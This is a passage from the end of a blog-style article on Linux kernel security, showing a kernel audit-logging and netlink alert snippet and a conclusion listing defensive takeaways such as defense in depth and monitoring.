    audit_log_format(ab, "security_event=%d msg=%s pid=%d uid=%d",
11
                    type, msg, current->pid, current_uid().val);
12
    audit_log_end(ab);
13

14
    // Send to userspace monitor
15
    netlink_send_alert(type, msg);
16
}

Conclusion#

Kernel security is an ongoing battle between attackers and defenders. Understanding exploitation techniques is crucial for building effective defenses. Key takeaways:

Assume Breach: Design systems assuming kernel compromise is possible
Defense in Depth: Layer multiple security mechanisms
Monitor Everything: Detection is as important as prevention
Stay Updated: New techniques emerge constantly
Test Security: Regular penetration testing and audits

The kernel will always be a high-value target. By understanding both attack and defense techniques, we can build more resilient systems and respond effectively when compromises occur.

Resources#

Next: Linux Kernel Observability and Tracing - Understanding System Behavior with ftrace, perf, and eBPF